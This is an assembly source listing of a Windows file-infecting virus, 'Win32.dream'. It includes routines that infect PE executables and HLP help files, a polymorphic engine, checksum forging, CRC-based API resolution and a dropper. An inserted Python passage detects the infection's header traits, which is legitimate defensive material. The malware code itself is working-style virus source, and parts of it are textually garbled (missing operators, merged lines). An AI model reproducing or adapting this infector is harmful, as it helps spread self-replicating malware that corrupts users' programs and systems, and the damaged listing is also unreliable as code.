Check_infected endp
DW infect_hlp-create_infected
CREATE_INFECTED PROC
Start_thread create_infected
Lea EDI, [ESI VBODY VSIZE 260]
Push EDI
Stosd
Call $ 241; Number of the Terms in A
SHR EAX, 29; Equation
XCHG EAX, ECX
Inc ECX
Push ECX
SUB ESP, 128
Fnsave [ESP]
Call $ 221; Generate a Multiplier ( /-)
Sub EDX, EDX
MOV EBX, 100000
Div EBX
OR EDX, EDX
JZ $ - 16
FLD1
RCR EAX, 1
JC $ 4
FCHS
Push Edx
FIMUL DWORD PTR [ESP]
FSTP TBYTE PTR [EDI]
POP EDX
Sub EDI, -TBYTE
Call $ 119; Generate An Exponent
Loop $ - 41; Next Term in the equation
Inc ECX
Inc ECX
Call $ 110; Two Points on The Curve
Loop $ - 5
Fnrstor [ESP]
SUB ESP, -128
POP EAX
Stosd
Lea ECX, [EDI TBYTE]
Sub EDI, [ESP]
XCHG Eax, EDI
POP EDI
Stosd
Pusha; Calculate An Angle, IT
MOV EBX, ESI; Means: Call Other Process
MOV [ESI Paramz (4-1) * 4], ECX
MOV [ESI Paramz (5-1) * 4], 1
Lea EDI, [ESI ACTIVE 1] Lea ESI, [ESI Process 1 * 8]
Lodsd
Push EAX
Lodsd
MOV BYTE PTR [EDI], 1
Push EAX 0 1F0FFFH
Call [EBX APIZ 4 * 12]; OpenProcess
POP ESI
Push 40 ESI
Call [EBX APIZ 4 * 13]; WaitforsingleObject
CMP Byte Ptr [EDI], 0
JNZ $ - 9
POPA
MOV [ESI Paramz (5-1) * 4], 0
END_THREAD CREATE_INFECTED
Call $ 66; Generate An Exponent
Sub EDX, EDX
Push 11
POP EBX
Div EBX
OR EDX, EDX
JZ $ -14
Push Edx
Fild DWORD PTR [ESP]
Call $ 15
DT 3FEB8637BD05AF6C69B6R
POP EAX EBX
FLD TBYTE PTR [EAX]
XCHG EBX, EAX
CDQ
Call $ 25
MOV EBX, 1000000
Div EBX
Push Edx
FIMUL DWORD PTR [ESP]
FSUB
FSTP TBYTE PTR [EDI]
POP EAX
Sub EDI, -TBYTE
RET
MOV Eax, 0; Get a Random Value
LpGettickCount Equ $ -4
Call EAX
Add Eax, 80h
PUSH ECX 33
POP ECX
Add Eax, EAX
JNC $ 4
XOR Al, 197
Loop $ - 6
MOV [EBP ($ - 16) -CREATE_INFECTED], EAX
POP ECX
RET
CREATE_INFECTED ENDP
DW infect_exe-infect_hlp
Infect_hlp proc
START_THREAD INFECT_HLP
SUB ESP, 16
SUB EBX, EBX
MOV Word PTR [ESI VBODY __ RETURN 11-VStart], 02EBH
Lea Eax, [ESI VBODY VSIZE]
PUSH EBX 80H 3 EBX EBX 0C0000000H EAX
Call [ESI APIZ 4 * 0]; Open File
INC EAX
JZ IH_FAILED
Dec EAX
Push EAX
MOV BH, 80H
Push EBX 40h
MOV EAX, 0
LPGLOBALLOC EQU $ -4
Call Eax; GlobalAlloc
MOV [ESP 4], EAX
XCHG Eax, ESI
Push 16
POP ECX
Sub EDX, EDX
Call read
JC IH_FREE
Lodsd
CMP EAX, 35F3FH; HLP Signature
JNZ IH_FREE
Lodsd
Lea Edx, [EAX 55]; Directory Offset
MOV ECX, 512
Lodsd
Lodsd
Call read
IH_SEARCH:
Dec ECX
JZ IH_FREE
CMP DWORD PTR [ESI ECX], 'Sys |'
JNZ IH_Search
CMP DWORD PTR [ESI ECX 4], 'Met'
JNZ IH_Search
MOV EAX, [ESI-4]
Xchg Eax, [ESI ECX 8] XCHG EAX, EDX
Push 21
SUB ESI, -512
POP ECX
Call read
Lodsd
Push 21
POP ECX
Sub Eax, ECX
Add Edx, ECX
MOV [ESP 4 4], EDX
MOV [ESP 8 4], EAX
Mov EDI, [ESP 4]
SUB EDI, -549
Lea ESI, [EBP HLP1_S-INFECT_HLP]
Lea Eax, [EDI SIZE-HLP1_S]
MOV [ESP 12 4], EAX
Push HLP1_E-HLP1_S
POP ECX
REP MOVSB
Push EDI
MOV EBX, [ESP 40 16 8 4]
Lea ESI, [EBX VBODY]
PUSH ESI
SUB ESI, -VSIZE
IH_NEXT:
SUB ESI, 4
MOV EAX, [ESI]
Call ihck
OR EDX, EDX
JNZ Ihex
Mov Al, 68h
Stosb
MOV EAX, [ESI]
Stosd
JMP IHDN
Ihex: MOV Al, 0B8H
Stosb
MOV EAX, [ESI]
XOR EAX, EDX
Stosd
MOV Al, 53
Stosb
MOV EAX, EDX
Stosd
MOV Al, 80
Stosb
IHDN: CMP [ESP], ESI
JNZ IH_NEXT
JMP IHCN
IHCK: CALL IHCV
JC IHA1
Sub EDX, EDX
RET
IHA1: MOV EBX, EAX
IHAX: MOV EAX, EBX
Call $ 9
DD 12345678H
POP EDX
SUB [EDX], 12345678H
Org $ -4
RND DD 87654321H
Mov Edx, [EDX]
XOR [EBP RND-INFECT_HLP], EDX
XOR EAX, EDX
Call IHCV
JC IHAX
XCHG EAX, EDX
Call IHCV
JC IHAX
XCHG EDX, EAX
RET
IHCV: Pusha
Push 4
POP ECX
ICVA: CMP AL, ''
JNA ICVF
CMP Al, 0F0H
JNBE ICVF
CMP Al, '""
JZ ICVF
CMP AL, "'"
JZ ICVF
CMP Al, "` "
JZ ICVF
CMP AL, "/"
JZ ICVF
Ror Eax, 8
Loop ICVA
Test Al, 0F9h
ICVF EQU $ -1
POPA
RET
IHCN: POP EAX EAX
MOV ECX, EDI
SUB ECX, EAX
Sub Eax, EAX
MOV [ESI ORG_EP-VSTART], EAX
Push ECX
SUB ECX, P1-HLP1_E HLP1_E-HLP2_E
MOV EAX, [ESP 12 4 4]
MOV [EAX], CX
SUB ESI, VSTART-HLP1_E
Push HLP2_SZ
POP ECX
REP MOVSB
POP EAX
MOV ESI, [ESP 4]; buffer
SUB ESI, -528
SUB EAX, HLP1_S-HLP2_E-21
MOV [ESI], EAX
Add [ESI 4], EAX
MOV ESI, EDI
MOV EDX, [ESP 4 4]
MOV ECX, [ESP 8 4]
Sub eax, ecxjna h_free
Call read
CMP [ESI 4], "` (rr "; already infected?
JZ IH_FREE
MOV EBX, [ESP 4]
Lea ECX, [EDI EAX]
SUB ECX, EBX
SUB ECX, 528
MOV EAX, [ESP 4]
SUB EAX, -528
Mov Edx, [EAX]
Sub EDX, ECX
SUB [EAX], EDX
Mov EDX, [EBX 12]
Lea ESI, [EBX 528]
Call write
MOV ESI, [ESP 4]
Push 16
Add [ESI 12], ECX
Sub EDX, EDX
POP ECX
Call write
MOV EDX, [ESI 4]
SUB EDX, -55
MOV ECX, 512
SUB ESI, -16
Call write
JMP IH_FREE
Spos: Pusha
Sub Eax, EAX
Push Eax Ex EDX DWORD PTR [ESP 4 * 5 8 * 4]
MOV EAX, 0
LpsetFilePointer EQU $ -4
Call EAX
POPA
RET
Read: Call SPOS
Pusha
Sub Eax, EAX
PUSH ECX EAX
Call $ 9
R_TS: DD?
PUSH ECX ESI DWORD PTR [ESP 4 * 6 8 * 4]
MOV EAX, 0
LpreadFile EQU $ -4
Call EAX
POP ECX
CMP DWORD PTR [EBP R_TS-INFECT_HLP], ECX
JNZ $ 3
Test Al, 0F9h
POPA
RET
Write: Call SPOS
Pusha
Sub Eax, EAX
Push EAX
Lea EBX, [EBP R_TS-INFECT_HLP]
Push EBX ES ESI DWORD PTR [ESP 4 * 5 8 * 4]
MOV EAX, [ESP 4 * 5 8 * 4 4 16 8 40]; OU! What does it mean :)?
Call [EAX APIZ 4 * 10]
POPA
RET
HLP1_S = $
DW 4
DW Offset Label1 - $ - 2
DB "RR (` USER32.DLL ', `Enumwindows',` su') ", 0
Label1 = $
DW 4
Size dw 0
P1 = $
DB "enumwindows (` "
HLP1_E = $ $
JMP ESP
DB "', 0)", 0
HLP2_E = $
HLP2_SZ = HLP2_E-HLP1_E
IH_FREE:
MOV ESI, [ESP 40 16 4 4]
Call [ESI APIZ 4 * 1]; CloseHandle
MOV EAX, 0
LPGLOBALFREE EQU $ -4
Call EAX
IH_FAILED:
SUB ESP, -12
END_THREAD INFECT_HLP
INFECT_HLP ENDP
DW POLY_ENGINE-INFECT_EXE
INFECT_EXE PROC
Start_thread infect_exe
SUB EBX, EBX
Lea Eax, [ESI VBODY VSIZE]
PUSH EBX 80H 3 EBX EBX 0C0000000H EAXCALL [ESI APIZ 4 * 0]; CreateFilea
INC EAX
JZ IE_Failed
Dec EAX
Push EAX EBX EAX
MOV EAX, 0
LpGetFileSize Equ $ -4
Call EAX
CMP Eax, 4096
JC IE_Close
CMP Eax, 104857600
JNBE IE_Close
MOV [EBP FSIZE-INFECT_EXE], EAX
Call $ 7
DB "1", 0
PUSH EBX EBX 2 EBX DWORD PTR [ESP 4 * 5]
Call [ESI APIZ 4 * 6]; CREATEFILEMAPPINGA
OR EAX, EAX
JZ IE_Close
PUSH EBX EBX EBX 4 EAX
Call [ESI APIZ 28]; MapViewoffile
OR EAX, EAX
JZ IE_MClose
Push EAX
CMP Word PTR [EAX], 'ZM'
JNZ IE_UNMAP
CMP Word PTR [EAX MZ_CRLC], BX
JZ IE_TESTED
CMP Word PTR [EAX MZ_LFARLC], 64
JC IE_UNMAP
IE_TESTED:
MOV EDI, [EAX MZ_LFANEW]
Add Edi, EAX
CMP DWORD PTR [EDI], 4550H
JNZ IE_UNMAP
MOV EAX, [ESP 4]
MOV [ESI Paramz (3-1) * 4], EAX
MOV EAX, [EBP FSIZE-INFECT_EXE]
MOV [ESI Paramz (4-1) * 4], EAX
Call Other_Process, 1; Active Check_infected Process
CMP [ESI Paramz (4-1) * 4], 1
JZ IE_UNMAP
Call Other_Process, 2; Active Create_infected Process
MOV AX, [EDI NT_FILEHEADER.FH_CHARACTERISTICS]]
Test AX, Image_File_Executable_Image
JZ IE_UNMAP
Test Ax, Image_File_DLL
JNZ IE_UNMAP
Movzx ECX, [EDI NT_FILEHEADER.FH_NUMBEROFSECTIONS]]
Dec ECX
OR ECX, ECX
JZ IE_UNMAP
Imul Eax, ECX, Image_SizeOf_SECTION_HEADER
Movzx EDX, [EDI NT_FILEHEADER.FH_SIZEOFOPTIONALHEADER]
MOV [EBP IE_SECTION-INFECT_EXE], EAX
Lea EBX, [EDX EDI NT_OPTIONALHEADER.OH_MAGIC]
Add Ebx, EAX
MOV EAX, [EBX Sh_SIZEOFRAWDATA]
Push EAX
Add Eax, [EBX SH_VIRTUALADDRESS]
Lea ECX, [ESI VBODY INF_EP-VSTART]
MOV [ECX], EAX
Mov Eax, [EDI NT_OPTIONALHEADER.OH_ADDRESSOFENTRYPOINT]
MOV [ECX 5 6], EAX
Call Other_Process, 5; Active Poly_Engine ProcessPop EAX
Add Eax, [EBX SH_POINTERTORAWDATA]
Add Eax, [ESI Paramz 4 * 0]
Add Eax, DWORD PTR [ESI VBODY VSIZE 260]
MOV ECX, [EDI NT_OPTIONALHEADER.OH_FILALIGNMENT]
Add Eax, ECX
CDQ
Dec EAX
Div ECX
Mul ECX
MOV [EBP Align_D-Infect_exe], EAX
Call [ESI APIZ 4 * 8]; UnmapViewoffile
Call [ESI APIZ 4 * 1]; CloseHandle
SUB EBX, EBX
Call $ 7
DB "1", 0
Align_D EQU $ 1
Push 80h EBX 4 EBX DWORD PTR [ESP 4 * 5]
Call [ESI APIZ 4 * 6]; CREATEFILEMAPPINGA
PUSH EBX EBX EBX 2 EAX
Call [ESI APIZ 4 * 7]; THX2 Bumblebee for His His HELP
Push EAX
Add eax, [eax.mz_lfanew]
XCHG Eax, EDI
MOV EBX, 0
IE_SECTION EQU $ -4
Movzx EDX, [EDI NT_FILEHEADER.FH_SIZEOFOPTIONALHEADER]
Lea Eax, [EDX EDI NT_OPTIONALHEADER.OH_MAGIC]
Movzx ECX, [EDI NT_FILEHEADER.FH_NUMBEROFSECTIONS]]
Add Eax, EBX
IE_Change_Flag:
OR [eax.sh_characteristics], image_scn_mem_write
Sub eax, image_sizeof_section_header
Loop ie_change_flag
Lea Eax, [EDX EDI NT_OPTIONALHEADER.OH_MAGIC]
Add Ebx, EAX
MOV EAX, [ESI VBODY INF_EP-VSTART]
MOV [EDI NT_OPTIONALHEADER.OH_ADDRESSOFENTRYPOINT], EAX
Pusha
MOV ECX, [ESI Paramz 4 * 0]
MOV [ESP 7 * 4], ECX
Mov EDI, [EBX Sh_SIZEOFRAWDATA]
Add [ESP 7 * 4], EDI
Add Edi, [EBX SH_POINTERTORAWDATA]
Add Edi, [ESP 7 * 4 4]
Lea ESI, [ESI VBODY VSIZE 260 CI_SIZE]; POLY VBODY
REP MOVSB
POPA
Mov Eax, [ESI Paramz 4 * 0]
Add Eax, [EBX Sh_SIZEOFRAWDATA]
MOV ECX, [EDI NT_OPTIONALHEADER.OH_FILALIGNMENT]
Add Eax, ECX
CDQ
Dec EAX
Div ECX
Mul ECX
MOV [EBX Sh_SIZEOFRAWDATA], EAX
Push EAX
MOV EAX, [EBX Sh_VIRTUALSIZE]
Add Eax, VSIZE 68MOV ECX, [EDI NT_OPTIONALHEADER.OH_SECTIONALNMENT]
Add Eax, ECX
CDQ
Dec EAX
Div ECX
Mul ECX
POP ECX
CMP EAX, ECX
JNC IE_1
MOV EAX, ECX
IE_1: MOV [EBX SH_VIRTUALSIZE], EAX
Add Eax, [EBX SH_VIRTUALADDRESS]
CMP Eax, [EDI NT_OPTIONALHEADER.OH_SIZEOFIMAGE]
JC IE_2
MOV [EDI NT_OPTIONALHEADER.OH_SIZEOFIMAGE], EAX
IE_2: or DWORD PTR [EBX Sh_CHARACTERISTICS], /
Image_scn_cnt_code or image_scn_mem_execute or /
Image_scn_mem_write
.IF DWORD PTR [EDI NT_OPTIONALHEADER.OH_CHECKSUM] != 0
MOV EAX, 0
Fsize EQU $ -4
Add Eax, [ESI Paramz (1-1) * 4]
MOV [ESI Paramz (2-1) * 4], EAX
Call Other_Process, 6; Active Checksum Process
Mov Eax, [ESI Paramz (4-1) * 4]
MOV [EDI NT_OPTIONALHEADER.OH_CHECKSUM], EAX
.endif
PUSH ESI
MOV EDI, [EBP Align_D-Infect_exe]
Add Edi, [ESP 4]
Lea ESI, [ESI VBODY VSIZE 260]
Lodsd
Sub Eax, 4-TBYTE
Sub EDI, EAX
XCHG EAX, ECX
REP MOVSB
POP ESI
IE_UNMAP:
Call [ESI APIZ 4 * 8]; UnmapViewoffile
IE_MClose:
Call [ESI APIZ 4 * 1]; CloseHandle
IE_Close:
Call [ESI APIZ 4 * 1]; CloseHandle
IE_failed:
END_THREAD INFECT_EXE
Other_Process Proc
Pusha
MOV ECX, [ESP 36]
MOV EBX, ESI
Lea EDI, [ESI ACTIVE ECX]
Lea ESI, [ESI Process ECX * 8]
Lodsd
Push EAX
Lodsd
MOV BYTE PTR [EDI], 1
Push EAX 0 1F0FFFH
Call [EBX APIZ 4 * 12]; OpenProcess
POP ESI
Push 40 ESI
Call [EBX APIZ 4 * 13]; WaitforsingleObject
CMP Byte Ptr [EDI], 0
JNZ $ - 9
POPA
Ret 4
Other_Process Endp
INFECT_EXE ENDP
DW CHECKSUM-POLY_ENGINE
POLY_ENGINE PROC
Start_thread poly_ENGINE
MOV EBX, ESI
Lea ESI, [EBX VBODY VSIZE]
Lea EDI, [ESI 260 CI_SIZE]
Push EBX EDI
SUB ECX, ECX
Mov Edx, vsize / 2
Mov Eax, 0E8h
Stosd
MOV Eax, 242C8300H
Stosd
MOV Al, 5
Stosb
@@ A: Call Random
Test Al, 1
JNZ @@ b
CMP EDX, 1
JZ @@ v
SUB ESI, 4
PUSH ESI
Lodsd
Call @@ 1_a
POP ESI
Dec edx
JMP @@k
@@ B: Test Al, 2
JNZ @@ c
@@ v: dec ESI
Dec ESI
PUSH ESI
Lodsw
Inc ECX
Call @@ 1_a
POP ESI
SUB CL, CL
JMP @@k
@@ C: Test Al, 4
JNZ @@ e
Call @@ 1; Push Random Value DWORD
JC $ 7
Call @@ 2
JMP @@ L
@@ E: inc ecx; Push Random Value Word
Call @@ 1
JC $ 7
Call @@ 2
SUB CL, CL
JMP $ 5
@@ K: DEC EDX
JZ $ 4
@@ L: JMP @@ a
MOV AX, 0E4FFH
Stosw
JMP PE_FAILED
@@ 1: Call Random; Push Random Value
Test Al, 1
JNZ @@ 1_d
@@ 1_a: xchg Eax, EBX; Push Certain Value
@@ 1_b: Jecxz @@ 1_c; Push Word
MOV Al, 66H
Stosb
@@ 1_c: Call @@ 3_a
Test Al, 0F9h
@@ 1_d EQU $ -1
RET
@@ 2: Call Random; Pop Reg32 or Add ESP, 4
Test Al, 1
JNZ @@ 2_b
And Al, 7
CMP AL, 4
JZ @@ 2
OR Al, Al
JZ @@ 2
Jecxz @@ 2_a
XCHG EAX, EBX
MOV Al, 66H
Stosb
XCHG EBX, EAX
@@ 2_a: add al, 58h
Stosb
RET
@@ 2_b: MOV AX, 0C483H
Stosw
MOV Al, 4
JECXZ @@ 2_c
MOV Al, 2
@@ 2_c: stosb
RET
@@ 3: xchg Eax, EBX; Push Certain Value in Eax
@@ 3_a: MOV Al, 68h; in EBX
Stosb
XCHG EAX, EBX
JECXZ @@ 3_b
Stosw
RET
@@ 3_b: stosd
RET
Random:
MOV EAX, 0BFF71234H
PUSH ECX 33
POP ECX
@@ r: add eax, EAX
JNC $ 4
XOR Al, 197
Loop @@ r
MOV [EBP RANDOM 1-POLY_ENGINE], EAX
POP ECX
RET
PE_FAILED:
POP ECX EBX
Sub EDI, ECX
MOV [EBX PARAMZ 4 * 0], EDI
END_THREAD POLY_ENGINE
POLY_ENGINE ENDP
DW K32_ADDRS-Checksum
Checksum Proc
Start_thread Checksum
XCHG EBX, ESI
Other_Process_Mem EBX 3; Get Mem from Other Process
MOV ECX, [EBX PARAMZ (2-1) * 4]
Sub EDX, EDX
SHR ECX, 1
@@ 1: lodsw
MOV EDI, 0FFFFH
And Eax, EDI
Add Edx, EAX
MOV EAX, EDX
And EDX, EDI
SHR EAX, 10h
Add Edx, EAX
Loop @@ 1
MOV EAX, EDX
SHR EAX, 10h
Add Ax, DX
Add Eax, [EBP 4]
MOV [EBX Paramz (4-1) * 4], EAX
Call [EBX APIZ 8 * 4]; UnmapViewoffile
Call [EBX APIZ 1 * 4]; CloseHandle
END_THREAD CHECKSUM
Checksum ENDP
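The header edits made by Infect_exe above (the IE_Change_Flag loop setting IMAGE_SCN_MEM_WRITE on every section, the last section being marked CODE|EXECUTE|WRITE, AddressOfEntryPoint moved to the end of the last section) and the CheckSum recomputation done by the Checksum process are exactly the traits a scanner can look for. The following Python is an added example written for this edition, not part of the original source: it computes the PE checksum the same way the word-summing loop at @@1 in Checksum does, then reports those header traits. The PE image it scans is constructed in memory by build_sample (a made-up two-section PE32, not a real binary), and the function names are the example's own.

```python
import struct

# Section characteristic bits the infector sets (values from winnt.h).
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE


def pe_checksum(data, checksum_offset):
    """PE checksum as the Checksum proc's @@1 loop computes it: sum 16-bit
    words with end-around carry, treat the CheckSum field as zero, fold to
    16 bits, then add the file size."""
    total = 0
    padded = data if len(data) % 2 == 0 else data + b"\0"
    for off in range(0, len(padded), 2):
        if off in (checksum_offset, checksum_offset + 2):
            continue
        total += struct.unpack_from("<H", padded, off)[0]
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return (total + len(data)) & 0xFFFFFFFF


def parse_pe(data):
    """Minimal PE32 header reader: e_lfanew -> IMAGE_NT_HEADERS -> sections."""
    nt = struct.unpack_from("<I", data, 0x3C)[0]
    if data[nt:nt + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    fh = nt + 4                                   # IMAGE_FILE_HEADER
    nsec = struct.unpack_from("<H", data, fh + 2)[0]
    opt_size = struct.unpack_from("<H", data, fh + 16)[0]
    oh = fh + 20                                  # IMAGE_OPTIONAL_HEADER
    sections = []
    for i in range(nsec):
        base = oh + opt_size + 40 * i             # IMAGE_SECTION_HEADER
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, base)
        chars = struct.unpack_from("<I", data, base + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode(), "vsize": vsize,
                         "va": va, "rawsize": rawsize, "rawptr": rawptr, "chars": chars})
    return {"entry": struct.unpack_from("<I", data, oh + 16)[0],
            "checksum": struct.unpack_from("<I", data, oh + 64)[0],
            "checksum_offset": oh + 64, "sections": sections}


def verify_checksum(data):
    pe = parse_pe(data)
    return pe["checksum"] == pe_checksum(data, pe["checksum_offset"])


def scan(data):
    """Return the header traits Infect_exe leaves behind (empty list if none)."""
    pe = parse_pe(data)
    secs = pe["sections"]
    findings = []
    if not secs:
        return findings
    if all(s["chars"] & IMAGE_SCN_MEM_WRITE for s in secs):
        findings.append("every section header has IMAGE_SCN_MEM_WRITE")
    last = secs[-1]
    if last["chars"] & RWX == RWX:
        findings.append("last section is CODE|EXECUTE|WRITE")
    if last["va"] <= pe["entry"] < last["va"] + max(last["vsize"], last["rawsize"]):
        findings.append("AddressOfEntryPoint lies in the last section")
    if pe["checksum"] and not verify_checksum(data):
        findings.append("CheckSum field does not match the file")
    return findings


def build_sample(infected):
    """Constructed PE32 (headers + two sections), not a real binary.
    With infected=True the headers are edited the way Infect_exe edits them."""
    file_align, sec_align, hdr_size = 0x200, 0x1000, 0x400
    secs = [[b".text", 0x100, 0x1000, 0x200, 0x400, 0x60000020],
            [b".data", 0x100, 0x2000, 0x200, 0x600, 0xC0000040]]
    entry, size_of_image = 0x1000, 0x3000
    if infected:
        for s in secs:
            s[5] |= IMAGE_SCN_MEM_WRITE           # IE_Change_Flag loop
        last = secs[-1]
        entry = last[2] + last[3]                # VirtualAddress + old SizeOfRawData
        last[3] += file_align                    # body appended, raw size re-rounded
        last[1] = max(last[1], last[3])          # VirtualSize >= SizeOfRawData
        last[5] |= RWX
        size_of_image = max(size_of_image, last[2] + last[1])
    image = bytearray(hdr_size + sum(s[3] for s in secs))
    image[:2] = b"MZ"
    nt = 0x80
    struct.pack_into("<I", image, 0x3C, nt)
    image[nt:nt + 4] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", image, nt + 4, 0x14C, len(secs), 0, 0, 0, 0xE0, 0x102)
    oh = nt + 24
    struct.pack_into("<H", image, oh, 0x10B)                 # PE32 magic
    struct.pack_into("<I", image, oh + 16, entry)
    struct.pack_into("<I", image, oh + 28, 0x400000)         # ImageBase
    struct.pack_into("<II", image, oh + 32, sec_align, file_align)
    struct.pack_into("<II", image, oh + 56, size_of_image, hdr_size)
    for i, (name, vsize, va, raw, ptr, chars) in enumerate(secs):
        base = oh + 0xE0 + 40 * i
        struct.pack_into("<8sIIII", image, base, name, vsize, va, raw, ptr)
        struct.pack_into("<I", image, base + 36, chars)
    struct.pack_into("<I", image, oh + 64, pe_checksum(image, oh + 64))
    return bytes(image)


if __name__ == "__main__":
    for label in ("clean", "infected"):
        print(label, scan(build_sample(label == "infected")))
```

Because the virus recomputes CheckSum through its Checksum process (only when the field was non-zero to begin with), a matching checksum says nothing about the file; the structural checks on section flags and entry point are what actually flag the infected sample.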
K32_ADDRS EQU this BYTE
X EQU
DW x lpcreatefile
DW x lpclosehandle
DW x lpcreatemutexa
DW x LpGetLastError
DW x LPRELESEMUTEX
DW x LPEXITPROCESS
DW x lpcreatefilemappinga
DW x lpmapviewoffile
DW x lpunmapviewoffile
DW x lpgetsystemdirectory
DW x lpwritefile
DW x lpcreateprocessa
DW x lpopenprocess
DW x lpwaitforsingleObject
DW x lpregisterServiceProcess
DW x LpGetFileSize
DW x LPGLOBALLOC
DW x LPGLOBALFREE
DW x lpreadfile
DW x lpsetfilepointer
DW x lpserrormode
DW x LpGetCurrentProcessID
DW x lpgetversion
DW x LpGettickCount
DW x malloc 63
DW x malloc 51
DW x malloc 106
DW x infect_file-2
Count EQU ($ -k32_addrs) / 2
K32_CRCS EQU this Byte
DD 08C892DDFH; CREATEFILEA
DD 068624A9DH; CloseHandle
DD 020B943E7H; CreateMutexa
DD 087D52C94H; getLastError
DD 0C449CF4EH; ReleaseMutexa
DD 040F57181H; EXITPROCESS
DD 096B2D96CH; CREATEFILEMAPPINGA
DD 0797B49ECH; MapViewoffile
DD 094524B42H; UnmapViewOffile
DD 0593AE7CEH; GetSystemDirectorya
DD 021777793H; WRITEFILE
DD 0267E0B05H; CREATEPROCESSA
DD 033D350C4H; OpenProcess
DD 0D4540229H; WaitforsingleObject
DD 05F31BC8EH; RegisterServiceProcess
DD 0ef7d811bh; getFileSize
DD 083A353C3H; GLOBALLOC
DD 05CDF6B6AH; GlobalFree
DD 054D8615AH; ReadFile
DD 085859D42H; SetFilePointer
DD 0A2EB817BH; SETERRORMODE
DD 0EB1CE85CH; getCurrentProcessid
DD 042F13D06H; GetVersion
DD 0613FD7BAH; GettickCount
DD 041D64912H; OpenFilemappinga
DD 0797B49ECH; MapViewOfFile (other address)
DD 019F33607H; CreateThread
DD 00ac136bah; SLEEP
DD 0
Process_maps Equ this Byte
DW x infect_file
DW x Check_infected
DW x create_infected
DW x infect_hlp
DW x infect_exe
DW x poly_ENGINE
DW x Checksum
P_number EQU ($ -Process_maps) / 2
DW x malloc 95
Process_Memory Struc
Thandle DD 0; Returned Thread Handle By Dropper
TH_MEMPOS DD 0; Thread Body Memory Position
Process DD P_Number DUP (0, 0); HProcess (Wait), Processid (Open)
APIZ DD Count-2 DUP (0); All API Functionz without Two Last
Active DB P_NUMBER DUP (0); Active Process (= FUNCTION)?
Paramz DD 8 DUP (0); Process Parameters
Vbody db vsize dup (0); Virus Body (Poly, Valuez)
FileName DD 260 DUP (0); Name of File (Opening, ETC)
CI_SIZE EQU 2 * 16 * (TBYTE TBYTE); Check_infected FPU Buffer
CINFECTED DB CI_SIZE DUP (0)
Poly_vbody EQU this BYTE
; ** this is tasm32 bug, Cannot ASM THROUGH CONST-> Proc DUP
ENDS
ALIGN 4
FILE_END:
DB 68 DUP (0)
MEM_END:
Push 401000H
SUB ESP, VSIZE
JMP vStart
FGX: DB "E: /X_WIN/Abcd.exe", 0
FG0: MOV EDX, Offset FGX
Sub Eax, EAX
Push Eax 80h 3 EAX Eax 0C0000000H EDX
Call Createfilea
PUSH 0 0
Call fg1
DB "Win32.dream - Welcome to my world ...", 0
FG1: Call FG2
DB "first generation sample", 0
FG2: PUSH 0
Call Messageboxa
Call EXITPROCESS
End MEM_END